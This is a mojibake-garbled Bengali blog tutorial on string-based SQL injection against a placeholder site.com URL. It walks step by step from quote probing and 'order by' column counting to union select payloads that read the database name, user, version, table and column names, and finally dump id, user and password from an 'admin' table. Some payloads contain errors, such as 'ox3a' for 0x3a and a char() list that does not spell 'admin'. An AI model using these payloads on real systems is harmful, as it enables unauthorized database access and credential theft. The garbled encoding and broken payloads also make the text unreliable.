āĻ¸āĻŦাāĻāĻে āĻ¸্āĻŦাāĻāĻ¤āĻŽ āĻāĻŽাāĻ° ā§¨ā§ āĻিāĻāĻোāĻ°িā§াāĻ˛ে 
āĻāĻ¤āĻŦাāĻ°েāĻ° āĻিāĻāĻোāĻ°িā§াāĻ˛ে āĻāĻŽি āĻ˛েāĻেāĻিāĻ˛াāĻŽ basic union based SQL INJECTION āĻ¨িā§ে।
āĻāĻāĻেāĻ° āĻিāĻāĻোāĻ°িā§াāĻ˛ে āĻāĻŽি āĻ˛েāĻāĻŦো String Based SQL Injection āĻ¨িā§ে ।
SQL Injection āĻ¨িā§ে āĻ˛েāĻা āĻāĻা āĻāĻŽাāĻ° ā§¨ā§ āĻিāĻāĻোāĻ°িā§াāĻ˛ ।
āĻāĻļা āĻāĻ°ি āĻŽāĻ¨োāĻ¯োāĻ āĻĻিā§ে āĻĒā§āĻŦেāĻ¨।
āĻāĻ˛ুāĻ¨ āĻ¤াāĻšāĻ˛ে āĻļুāĻ°ু āĻāĻ°া āĻ¯াāĻ
(āĻিāĻāĻোāĻ°িā§াāĻ˛ āĻি āĻļুāĻ§ুāĻŽাāĻ¤্āĻ° āĻļিāĻ্āĻˇāĻ¨ীā§ āĻāĻĻ্āĻĻ্āĻ¯েāĻļ্āĻ¯ে āĻ˛িāĻিāĻ¤)
Union Based SQLi āĻি āĻ¸েāĻা āĻŦোāĻাāĻ° āĻāĻ¨্āĻ¯ে āĻāĻŽাāĻ° āĻāĻেāĻ° āĻিāĻāĻোāĻ°িā§াāĻ˛āĻি āĻĻেāĻāĻ¤ে āĻĒাāĻ°েāĻ¨ঃ Web Site Hacking : Union Based Sql Injection
āĻ¸āĻšāĻ āĻাāĻŦে āĻŦুāĻাāĻ¤ে āĻেāĻ˛ে String Based Sql Injection āĻšāĻ˛ো āĻ¯āĻāĻ¨ āĻāĻāĻি āĻ¸াāĻāĻ Sql Injection āĻুāĻ˛āĻ¨āĻ°াāĻŦāĻ˛ āĻšā§ ।
āĻিāĻ¨্āĻ¤ু āĻ¯āĻāĻ¨ āĻāĻ্āĻ¯াāĻাāĻ° Sql Injection āĻāĻŽাāĻ¨্āĻĄ āĻāĻ্āĻ¸িāĻিāĻāĻ āĻāĻ°ে āĻ¤āĻāĻ¨ āĻোāĻ¨ো āĻ°েāĻ¸াāĻ˛্āĻ āĻĻেāĻাā§ āĻ¨া।
(āĻāĻāĻা āĻļিāĻ্āĻˇāĻ¨ীā§ āĻŦিāĻˇā§ঃ Sql Injection āĻāĻ°াāĻ° āĻ¸āĻŽā§ āĻ āĻ¨েāĻ āĻ¸াāĻāĻে āĻĄাāĻা āĻā§েāĻŦ āĻĒেāĻāĻে āĻĻেāĻাā§ āĻ¨াāĻš।। āĻ¸ে āĻ্āĻˇেāĻ¤্āĻ°ে āĻĄাāĻা āĻĻেāĻাā§
āĻাāĻāĻেāĻ˛ āĻŦাāĻ°ে āĻŦ্āĻ°াāĻāĻাāĻ°েāĻ°)
String Based SQL Injection āĻŦোāĻা āĻ¯াā§ āĻ
āĻ¨েāĻ āĻ¸āĻŽā§ āĻāĻ°āĻāĻŽ āĻāĻ°āĻ° āĻĻেāĻে ।
āĻāĻ āĻ§āĻ°āĻ¨েāĻ° āĻāĻ°āĻ°।
"order by" doesn't work, example: order by 100--
āĻ
āĻ¨েāĻ āĻ¸āĻŽā§ āĻ¨াāĻ āĻĨাāĻāĻ¤ে āĻĒাāĻ°ে āĻ¸ে āĻ্āĻˇেāĻ¤্āĻ°ে āĻāĻĒāĻ¨ি āĻĒ্āĻ°āĻĨāĻŽে
Basic SQL āĻ
āĻ¨ুāĻ¸āĻ°āĻ¨ āĻāĻ°ে āĻ¯āĻĻি āĻোāĻ¨ো āĻ°েāĻ¸াāĻ˛্āĻ āĻ¨া āĻĒাāĻ¨ āĻ¤াāĻšāĻ˛ে āĻ¸্āĻ্āĻ°িং āĻŦেāĻāĻĄ SQL injection āĻ্āĻ°াāĻ āĻāĻ°ে āĻĻেāĻāĻ¤ে āĻĒাāĻ°েāĻ¨।
āĻāĻ¸āĻ˛ে string based sqli āĻšāĻ˛ে āĻāĻĒāĻ¨ি āĻāĻŽাāĻ¨্āĻĄ āĻāĻ্āĻ¸িāĻিāĻāĻ āĻāĻ°াāĻ° āĻĒāĻ°āĻ āĻোāĻ¨ো āĻ°েāĻ¸াāĻ˛্āĻ āĻāĻ¸āĻŦে āĻ¨া ।
āĻ¸াāĻāĻāĻি āĻāĻেāĻ° āĻŽāĻ¤āĻ¨āĻ āĻ¨āĻ°āĻŽাāĻ˛ āĻĻেāĻাāĻŦে।
Union Based āĻāĻ° āĻ¸াāĻĨে String Based āĻāĻ° āĻŽāĻ§্āĻ¯ে āĻ¤েāĻŽāĻ¨ āĻোāĻ¨ো āĻĒাāĻ°্āĻĨāĻ্āĻ¯ āĻ¨েāĻ।
āĻ¤াāĻšāĻ˛ে āĻāĻ¸ুāĻ¨ āĻļুāĻ°ু āĻāĻ°া āĻ¯াāĻ।
āĻŽāĻ¨ে āĻāĻ°ুāĻ¨ āĻāĻ°āĻāĻŽ āĻāĻāĻি āĻ¸াāĻāĻে āĻāĻŽāĻ°া SQLi āĻāĻ°āĻŦো।
http://site.com/index.php?id=10
āĻĒ্āĻ°āĻĨāĻŽেāĻ SQLi āĻুāĻ˛āĻ¨াāĻ°āĻŦāĻ˛ āĻ¨াāĻি āĻĻেāĻāĻŦো Url āĻāĻ° āĻļেāĻˇে ' āĻāĻ āĻিāĻš্āĻ¨ āĻি āĻĻিā§ে
http://site.com/index.php?id=10'
āĻāĻ°āĻ° āĻĻেāĻāĻ¤ে āĻĒেāĻ˛ে āĻāĻŽাāĻĻেāĻ° āĻাāĻ āĻšāĻŦে āĻ¸াāĻāĻāĻিāĻ¤ে āĻā§āĻা āĻāĻ˛াāĻŽ āĻāĻে āĻ¸েāĻা āĻŦেāĻ° āĻāĻ°া ।
āĻāĻāĻ¨ āĻāĻŽāĻ°া āĻĒ্āĻ°āĻĨāĻŽেāĻ Union Based āĻেāĻˇ্āĻা āĻāĻ°ে āĻĻেāĻāĻŦো ।
http://site.com/index.php?id=10 order by 10 (āĻোāĻ¨ো āĻāĻ°āĻ° āĻĻেāĻাāĻ্āĻে āĻ¨া āĻŦা āĻĄাāĻা āĻŽিāĻ¸ āĻšāĻ্āĻে āĻ¨া)
order by āĻāĻ° āĻĒāĻ°েāĻ° āĻ¸ংāĻ্āĻ¯া āĻি āĻŦাā§িā§ে āĻĻিā§ে āĻĻেāĻি
http://site.com/index.php?id=10 order by 1000 (āĻোāĻ¨ো āĻāĻ°āĻ° āĻĻেāĻাāĻ্āĻে āĻ¨া āĻŦা āĻĄাāĻা āĻŽিāĻ¸ āĻšāĻ্āĻে āĻ¨া)
āĻ¤াāĻšāĻ˛ে āĻāĻ āĻ¸াāĻāĻāĻি āĻ¤ে āĻāĻŽāĻ°া String Based SQLi āĻŦ্āĻ¯াāĻŦāĻšাāĻ° āĻāĻ°āĻŦো।
āĻ¯াāĻ° āĻāĻ¨্āĻ¯ে āĻāĻŽাāĻĻেāĻ° id=value āĻāĻ°āĻĒāĻ°ে āĻāĻāĻি ' (āĻ¸্āĻ্āĻ°িং) āĻ¯ুāĻ্āĻ¤ āĻāĻ°āĻ¤ে āĻšāĻŦে āĻāĻŦং āĻāĻŽাāĻ¨্āĻĄ āĻāĻ° āĻļেāĻˇে --+ (āĻŽাāĻāĻ¨াāĻ¸,āĻŽাāĻāĻ¨াāĻ¸,āĻĒ্āĻ˛াāĻ¸) āĻāĻ āĻ¸াāĻāĻ¨
āĻুāĻ˛ো āĻ¯ুāĻ্āĻ¤ āĻāĻ°āĻ¤ে āĻšāĻŦে।
āĻ¤াāĻšāĻ˛ে āĻĻেāĻিঃ
http://site.com/index.php?id=10' order by 10--+ (āĻŽāĻ¨ে āĻāĻ°ুāĻ¨ āĻāĻ°āĻ° āĻĻেāĻāĻ¤ে āĻĒেāĻ˛াāĻŽ)
āĻāĻāĻ¨ āĻ¯āĻĻি āĻāĻĒāĻ¨াāĻ° āĻাāĻ°্āĻেāĻ āĻ¸াāĻāĻে ā§§ā§Ļ āĻি āĻāĻ˛াāĻŽ āĻ¨া āĻĨাāĻে āĻ¤াāĻšāĻ˛ে āĻāĻĒāĻ¨ি āĻāĻ°āĻ° āĻĻেāĻāĻ¤ে āĻĒাāĻŦেāĻ¨ āĻŦা āĻ¸াāĻāĻāĻি āĻĨেāĻে āĻĄাāĻা āĻŽিāĻ¸ āĻāĻ°āĻŦে।
(āĻŦিঃāĻĻ্āĻ°ঃ āĻিāĻāĻোāĻ°িā§াāĻ˛āĻি āĻļিāĻ্āĻˇāĻ¨ীā§ āĻāĻĻ্āĻĻ্āĻ¯েāĻļ্āĻ¯ে āĻ˛িāĻা āĻŦিāĻ§াā§ āĻāĻŽি āĻোāĻ¨ো āĻ˛াāĻāĻ āĻ¸াāĻāĻ āĻ¨িā§ে āĻĻেāĻাāĻ˛াāĻŽ āĻ¨া।)
- http://site.com/index.php?id=10' order by 9--+ (still Error)
- http://site.com/index.php?id=10' order by 8--+ (Error)
- http://site.com/index.php?id=10' order by 7--+ (Error)
- http://site.com/index.php?id=10' order by 6--+ (No Error)
āĻ¤াāĻ° āĻŽাāĻ¨ে āĻšāĻ˛ো āĻ¸াāĻāĻāĻি āĻ¤ে ā§Ŧ āĻি āĻāĻ˛াāĻŽ ।
āĻāĻāĻ¨ āĻāĻŽāĻ°া āĻāĻ āĻā§āĻি āĻāĻ˛াāĻŽ āĻĨেāĻে āĻোāĻ¨ āĻāĻ˛াāĻŽ āĻি āĻুāĻ˛āĻ¨াāĻ°াāĻŦāĻ˛ āĻŦা āĻ¸্āĻ্āĻ°িং āĻāĻ˛াāĻŽ āĻ¸েāĻা āĻেāĻ āĻāĻ°āĻŦো āĻ¯াāĻ° āĻāĻ¨্āĻ¯ে āĻāĻŽাāĻ¨্āĻĄ āĻšāĻŦেঃ
- http://site.com/index.php?id=-10' union select 1,2,3,4,5,6--+
āĻāĻāĻ¨ āĻ¸াāĻāĻেāĻ° āĻĒেāĻāĻে āĻŦা āĻŦ্āĻ°াāĻāĻাāĻ°েāĻ° āĻাāĻāĻেāĻ˛ āĻŦাāĻ°ে āĻুāĻ˛āĻ°াāĻŦāĻ˛ āĻāĻ˛াāĻŽ/āĻāĻ˛াāĻŽāĻিāĻ° āĻ¨াāĻŽ্āĻŦাāĻ° āĻĻেāĻাāĻŦে ।
(āĻুāĻ˛āĻ¨াāĻ°āĻŦāĻ˛ āĻāĻ˛াāĻŽেāĻ° āĻ¸ংāĻ্āĻ¯া āĻ
āĻ¨েāĻ āĻ¸āĻŽā§ ā§¨ āĻি āĻŦা āĻ¤াāĻ° āĻ
āĻ§িāĻ āĻšāĻ¤ে āĻĒাāĻ°ে)
āĻāĻāĻ¨ āĻāĻŽāĻ°া āĻ¯āĻĻি āĻুāĻ˛āĻ¨াāĻ°āĻŦāĻ˛ āĻāĻ˛াāĻŽ āĻĒাā§ ā§¨ āĻ¨āĻŽ্āĻŦāĻ° āĻāĻ˛াāĻŽ।
āĻ¤াāĻšāĻ˛ে āĻāĻŽāĻ°া āĻ¸েāĻ āĻāĻ˛াāĻŽেāĻ° āĻাā§āĻাā§ SQLi āĻāĻŽাāĻ¨্āĻĄ āĻĻিā§ে āĻĄাāĻাāĻŦেāĻ¸ āĻĨেāĻে āĻĄাāĻা āĻ°িāĻĄ āĻāĻ°āĻ¤ে āĻĒাāĻ°āĻŦো।
#āĻĒ্āĻ°āĻĨāĻŽে āĻĻেāĻি āĻ¨িā§ āĻĄাāĻাāĻŦেāĻ¸েāĻ° Version āĻি āĻ Database Name āĻি āĻāĻŦং Database User āĻāĻ° āĻ¨াāĻŽ ।
āĻ¯াāĻ° āĻāĻ¨্āĻ¯ে āĻāĻŽāĻ°া āĻāĻŽাāĻ¨্āĻĄ āĻŦ্āĻ¯াāĻŦāĻšাāĻ° āĻāĻ°āĻŦো " group_concat(database()),concat(user(),ox3a,version "
āĻāĻĻাāĻšাāĻ°āĻ¨ঃ
- http://site.com/index.php?id=-10' union select 1,group_concat(database()),concat(user(),ox3a,version ,3,4,5,6--+
(āĻāĻাāĻ¨ে āĻ¯েāĻšুāĻ¤ু āĻুāĻ˛āĻ¨াāĻ°āĻŦāĻ˛ āĻāĻ˛াāĻŽ ā§¨ āĻ¤াāĻ āĻāĻŽāĻ°া ā§¨ āĻ¨āĻŽ্āĻŦāĻ° āĻāĻ° āĻাā§āĻাā§ āĻāĻŽাāĻĻেāĻ° āĻāĻŽাāĻ¨্āĻĄ āĻ°াāĻ¨ āĻāĻ°াāĻŦো)
āĻāĻāĻ¨ āĻāĻŽāĻ°া
Version ,Database Name , Database User āĻāĻāĻুāĻ˛া āĻĻেāĻāĻ¤ে āĻĒাāĻŦো ...
āĻāĻāĻ¨ āĻāĻŽāĻ°া āĻ¯āĻĻি āĻĄাāĻাāĻŦেāĻেāĻ° āĻেāĻŦāĻ˛ āĻুāĻ˛ো āĻĻেāĻāĻ¤ে āĻাā§ āĻ¤াāĻšāĻ˛ে āĻāĻŽাāĻ¨্āĻĄ āĻšāĻŦে
- http://site.com/index.php?id=-10' union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--+-
āĻāĻāĻ¨ āĻāĻŽāĻ°া āĻĄাāĻাāĻŦেāĻ¸েāĻ° āĻেāĻŦāĻ˛ āĻুāĻ˛োāĻ° āĻ¨াāĻŽ āĻĻেāĻāĻ¤ে āĻĒাāĻŦো।
āĻāĻāĻ¨ āĻ¯āĻĻি āĻāĻĒāĻ¨ি āĻ¯ে āĻেāĻŦিāĻ˛ āĻুāĻ˛ো āĻĒেāĻ˛েāĻ¨ āĻ¤াāĻ° āĻŽāĻ§্āĻ¯ে āĻāĻĒāĻ¨াāĻ° āĻাāĻ্āĻিāĻ¤ āĻĄাāĻা āĻ¯ে āĻেāĻŦিāĻ˛ে āĻāĻে āĻ¸েāĻ āĻেāĻŦিāĻ˛ āĻĨেāĻে āĻāĻ˛াāĻŽ āĻŦেāĻ° āĻāĻ°āĻ¤ে āĻাāĻ¨।
āĻŽāĻ¨ে āĻāĻ°েāĻ¨ āĻ¯ে āĻāĻĒāĻ¨ি āĻĒেā§েāĻেāĻ¨ "admin" āĻ¨াāĻŽে āĻāĻ āĻেāĻŦিāĻ˛ āĻি āĻāĻāĻ¨ āĻāĻĒāĻ¨ি āĻ¯āĻĻি "admin" āĻেāĻŦিāĻ˛েāĻ° āĻāĻ˛াāĻŽ āĻুāĻ˛ো āĻĻেāĻāĻ¤ে āĻাāĻ¨ āĻ¤াāĻ° āĻāĻ¨্āĻ¯ে āĻāĻŽাāĻ¨্āĻĄ āĻšāĻŦে
āĻĒ্āĻ°āĻĨāĻŽে "admin" āĻেāĻŦিāĻ˛ āĻ¨েāĻŽāĻিāĻে āĻšেāĻ্āĻ¸ে (hex) āĻāĻ¨āĻাāĻ°্āĻ āĻāĻ°ে āĻ¨িāĻ¤ে āĻšāĻŦে। āĻ¯াāĻ° āĻāĻ¨্āĻ¯ে āĻŽোāĻিāĻ˛া āĻŦ্āĻ°াāĻāĻাāĻ°ে āĻš্āĻ¯াāĻāĻŦাāĻ° āĻ¨াāĻŽে āĻāĻāĻি āĻāĻĄāĻ
āĻ¨ āĻāĻে
āĻ¸েāĻা āĻŦ্āĻ¯াāĻŦāĻšাāĻ° āĻāĻ°āĻ¤ে āĻĒাāĻ°েāĻ¨ ।
"admin" āĻেāĻŦিāĻ˛āĻে āĻšেāĻ্āĻ¸ে āĻ°ুāĻĒাāĻ¨্āĻ¤āĻ° āĻāĻ°াāĻ° āĻĒāĻ° āĻĒেāĻ˛াāĻŽ 0x61646d696e
āĻāĻāĻ¨ āĻāĻŽাāĻ¨্āĻĄāĻা āĻšāĻŦে।
āĻāĻĻাāĻšাāĻ°āĻŖঃ
- http://site.com/index.php?id=-10' union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=char(104,111,109,101,112,97,103,101,117,115,101,114,115)--+-
āĻāĻāĻ¨ āĻāĻŽāĻ°া "admin" āĻেāĻŦিāĻ˛েāĻ° āĻāĻ˛াāĻŽ āĻুāĻ˛ো āĻĻেāĻāĻ¤ে āĻĒাāĻŦো।
āĻŽāĻ¨ে āĻāĻ°ুāĻ¨ āĻāĻŽāĻ°া āĻĒেāĻ˛াāĻŽঃ "id , user , password"
āĻāĻ āĻ¤িāĻ¨āĻি āĻāĻ˛াāĻŽ āĻĒেāĻ˛াāĻŽ । āĻāĻāĻ¨ āĻāĻŽāĻ°া āĻ¯āĻĻি āĻāĻ āĻ¤িāĻ¨āĻি āĻāĻ˛াāĻŽ āĻĨেāĻে āĻĄাāĻা āĻĄাāĻŽ্āĻĒ āĻāĻ°āĻ¤ে āĻাā§ āĻŦা āĻš্āĻ¯াāĻ āĻāĻ°āĻ¤ে āĻাā§ ।
āĻ¤াāĻšāĻ˛ে āĻāĻŽাāĻ¨্āĻĄ āĻšāĻŦে ।
āĻāĻĻাāĻšাāĻ°āĻŖঃ
- http://site.com/index.php?id=-10' union select 1,2,3,group_concat(id,0x3e,user,0x3e,password),5,6 from admin--+-
āĻāĻ āĻāĻŽাāĻ¨্āĻĄāĻি āĻāĻŽাāĻĻেāĻ° admin āĻেāĻŦিāĻ˛েāĻ° id,user,password āĻāĻ āĻāĻ˛াāĻŽ āĻুāĻ˛োāĻ° āĻĄাāĻা āĻĻেāĻাāĻŦে 
āĻ§āĻ¨্āĻ¯āĻŦাāĻĻ āĻāĻˇ্āĻ āĻāĻ°ে āĻĒā§াāĻ° āĻāĻ¨্āĻ¯ে ।
āĻোāĻ¨ো āĻ
āĻ¸ুāĻŦিāĻ§া āĻšāĻ˛ে āĻ
āĻĨāĻŦা āĻোāĻ¨ো āĻাāĻ°āĻŖে āĻ¯োāĻাāĻ¯োāĻ āĻāĻ°āĻ¤ে āĻাā§āĻ˛ে āĻāĻŽাāĻ° āĻĢেāĻāĻ¸āĻŦুāĻ āĻāĻāĻĄিāĻ¤ে āĻ¯োāĻাāĻ¯োāĻ āĻāĻ°āĻ¤ে āĻĒাāĻ°েāĻ¨ঃ
FACEBOOK ID
āĻ§āĻ¨্āĻ¯āĻŦাāĻĻ – āĻŽূāĻ˛ āĻ˛েāĻāĻে FACEBOOK ID
āĻĒোāĻ¸্āĻ āĻ¸āĻŽ্āĻĒāĻ°্āĻিāĻ¤ āĻ¸āĻŽāĻ¸্āĻ¯াāĻ° āĻāĻ¨্āĻ¯ āĻŽāĻ¨্āĻ¤āĻŦ্āĻ¯ āĻĻিāĻ¨।āĻĄাāĻāĻ¨āĻ˛োāĻĄ āĻ˛িāĻ্āĻ āĻ āĻ¸āĻŽāĻ¸্āĻ¯া āĻāĻ¨্āĻ¯ āĻāĻ¨āĻŦāĻ্āĻ¸ āĻāĻ°ুāĻ¨ Aimzworld007
ConversionConversion EmoticonEmoticon